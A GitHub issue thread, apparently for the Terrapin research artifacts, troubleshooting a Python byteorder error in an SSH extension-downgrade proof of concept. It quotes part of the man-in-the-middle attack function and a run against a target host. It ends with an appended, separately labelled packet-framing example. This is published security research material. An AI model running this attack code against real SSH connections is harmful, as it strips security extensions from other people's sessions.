Closed charlesmanser closed 6 months ago
Specifying "little" as the byteorder seems to have resolved the issue:
```python
def perform_attack(client_socket, server_socket):
    # Version exchange
    client_vex = client_socket.recv(255)
    server_vex = server_socket.recv(255)
    client_socket.send(server_vex)
    server_socket.send(client_vex)
    # SSH_MSG_KEXINIT
    client_kexinit = client_socket.recv(35000)
    server_kexinit = server_socket.recv(35000)
    client_socket.send(server_kexinit)
    server_socket.send(client_kexinit)
    # Client will now send the key exchange INIT
    client_kex_init = client_socket.recv(35000)
    server_socket.send(client_kex_init)
    # Insert ignore message (to client)
    client_socket.send(rogue_msg_ignore)
    # Wait half a second here to avoid missing EXT_INFO
    # Can be solved by counting bytes as well
    sleep(0.5)
    # KEX_REPLY / NEW_KEYS / EXT_INFO
    server_response = server_socket.recv(35000)
    # Strip EXT_INFO before forwarding server_response to client
    # Length fields of KEX_REPLY and NEW_KEYS are still unencrypted
    byteorder = "little"
    server_kex_reply_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[:LENGTH_FIELD_LENGTH], byteorder=byteorder)
    server_newkeys_start = server_kex_reply_length
    server_newkeys_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[server_newkeys_start:server_newkeys_start + LENGTH_FIELD_LENGTH], byteorder=byteorder)
    server_extinfo_start = server_newkeys_start + server_newkeys_length
    client_socket.send(server_response[:server_extinfo_start])
```
How did you get the issue? Tell me the steps you've followed so that I can regenerate the issue.
```
[root@cm-terrapin ext-downgrade]# python ext_downgrade_chacha20_poly1305.py
--- Proof of Concept for extension downgrade attack (ChaCha20-Poly1305) ---
[+] MitM Proxy started. Listening on ('127.0.0.1', 2222) for incoming connections...
[+] Accepted connection from: ('127.0.0.1', 46684)
[+] Establishing new target connection to ('10.32.152.27', 22).
[+] Performing extension downgrade
Traceback (most recent call last):
  File "/root/Terrapin-Artifacts/pocs/ext-downgrade/ext_downgrade_chacha20_poly1305.py", line 87, in <module>
    perform_attack(client_socket, server_socket)
  File "/root/Terrapin-Artifacts/pocs/ext-downgrade/ext_downgrade_chacha20_poly1305.py", line 66, in perform_attack
    server_kex_reply_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[:LENGTH_FIELD_LENGTH])
TypeError: from_bytes() missing required argument 'byteorder' (pos 2)
```
The default argument value for `byteorder` has been added in Python 3.11. Using a Python version < 3.11 will yield the error mentioned above as `byteorder` is required and no default argument value is set. Note that Python 3.11 and newer will default to `byteorder = 'big'`, which is correct in this context (network byte order). Setting `byteorder = 'little'` may cause unexpected behavior due to wrong byte order conversion.
I will update the PoCs with an explicit `byteorder = 'big'` argument. To avoid this issue entirely, you may update your Python version to 3.11 or newer.
I have added the explicit `byteorder = 'big'` argument in https://github.com/RUB-NDS/Terrapin-Artifacts/commit/8a2416c82ebd2a1a097c11f513bbab73db55798e, which should fix this issue. Feel free to reopen in case your issue persists.
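The byte-order point from this thread, as an added example that is not part of the original issue or of the Terrapin-Artifacts code: a framing check over constructed, unencrypted SSH binary packets shows that the `packet_length` field only yields valid packet boundaries when read as big-endian. The helper names (`frame`, `packet_boundaries`) and the sample payloads are hypothetical.

```python
import struct

LENGTH_FIELD_LENGTH = 4  # uint32 packet_length, network byte order (RFC 4253, section 6)


def frame(payload, block_size=8):
    """Build one unencrypted SSH binary packet (used only to construct sample data)."""
    # Total size must be a multiple of block_size, with at least 4 bytes of padding.
    padding = block_size - ((LENGTH_FIELD_LENGTH + 1 + len(payload)) % block_size)
    if padding < 4:
        padding += block_size
    body = bytes([padding]) + payload + bytes(padding)
    return struct.pack(">I", len(body)) + body


def packet_boundaries(buf, byteorder="big"):
    """Return (start, end) offsets of each length-prefixed packet in buf."""
    bounds, pos = [], 0
    while pos < len(buf):
        header = buf[pos:pos + LENGTH_FIELD_LENGTH]
        if len(header) < LENGTH_FIELD_LENGTH:
            raise ValueError(f"truncated length field at offset {pos}")
        # Passing byteorder explicitly works on every Python 3 version;
        # the 'big' default only exists from Python 3.11 onwards.
        length = int.from_bytes(header, byteorder=byteorder)
        end = pos + LENGTH_FIELD_LENGTH + length
        if length == 0 or end > len(buf):
            raise ValueError(f"implausible packet_length {length} at offset {pos}")
        bounds.append((pos, end))
        pos = end
    return bounds


# Constructed sample: two back-to-back packets with made-up payloads.
SAMPLE = frame(b"\x15") + frame(b"\x02" + b"constructed")

if __name__ == "__main__":
    print("big-endian boundaries:", packet_boundaries(SAMPLE, "big"))
    try:
        packet_boundaries(SAMPLE, "little")
    except ValueError as exc:
        # 00 00 00 0c read as little-endian is 0x0c000000, far past the buffer.
        print("little-endian:", exc)
```

Without the bounds check, Python slicing silently clamps an oversized offset to the end of the buffer, so a wrong byte order would go unnoticed instead of raising.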
Issue running ext_downgrade_chacha20_poly1305.py
Running on: